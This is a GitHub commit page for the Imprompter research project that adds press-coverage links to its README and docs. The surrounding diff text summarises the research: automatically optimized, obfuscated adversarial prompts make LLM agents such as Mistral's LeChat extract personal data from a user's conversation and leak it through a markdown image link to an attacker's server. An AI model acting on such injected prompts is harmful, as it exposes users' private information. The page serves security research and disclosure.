Skip to content

Commit

Permalink
add press pointers
Browse files Browse the repository at this point in the history
  • Loading branch information
Reapor-Yurnero committed Oct 22, 2024
1 parent 1532705 commit 5a89db3
Show file tree
Hide file tree
Showing 2 changed files with 3 additions and 2 deletions.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@ A screencast showing how an attacker can exfiltrate the user's PII in real world

![img](docs/attack_screenshot_annotated.png)

More video demos can be found on our [website](https://imprompter.ai).
More video demos can be found on our [website](https://imprompter.ai). **Meanwhile, big thanks to Matt Burges from WIRED and Simon Willison for writing cool stories ([WIRED](https://www.wired.com/story/ai-imprompter-malware-llm/), [Simon's Blog](https://simonwillison.net/2024/Oct/22/imprompter/)) covering this project!**

## Setup

Expand Down
3 changes: 2 additions & 1 deletion docs/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -5,11 +5,12 @@ hide:

<h1 style="margin-bottom: -1rem"></h1>


## Overview

Large Language Model (LLM) Agents are an emerging computing paradigm that blends generative machine learning with tools such as code interpreters, web browsing, email, and more generally, external resources. These agent-based systems represent an emerging shift in personal computing. We contribute to the security foundations of agent-based systems and surface a new class of automatically computed obfuscated adversarial prompt attacks that violate the confidentiality and integrity of user resources connected to an LLM agent. We show how prompt optimization techniques can find such prompts automatically given the weights of a model. We demonstrate that such attacks transfer to production-level agents. For example, we show an information exfiltration attack on Mistral's LeChat agent that analyzes a user's conversation, picks out personally identifiable information, and formats it into a valid markdown command that results in leaking that data to the attacker's server. This attack shows a nearly 80% success rate in an end-to-end evaluation. We conduct a range of experiments to characterize the efficacy of these attacks and find that they reliably work on emerging agent-based systems like Mistral's LeChat, ChatGLM, and Meta's Llama. These attacks are multimodal, and we show variants in the text-only and image domains.

We present various demos and textual adversarial prompts on this page. For full details, please refer to our [paper](https://arxiv.org/abs/2410.14923){target="_blank"}.
We present various demos and textual adversarial prompts on this page. For full details, please refer to our [paper](https://arxiv.org/abs/2410.14923){target="_blank"}. *Meanwhile, Matt Burges from WIRED and Simon Willison have written some cool stories ([WIRED](https://www.wired.com/story/ai-imprompter-malware-llm/), [Simon's Blog](https://simonwillison.net/2024/Oct/22/imprompter/)) covering this project. Good resources for lighter reading if you are not in the mood for a 13-page paper!*

## Video Demo on Real Products

Expand Down

0 comments on commit 5a89db3

Please sign in to comment.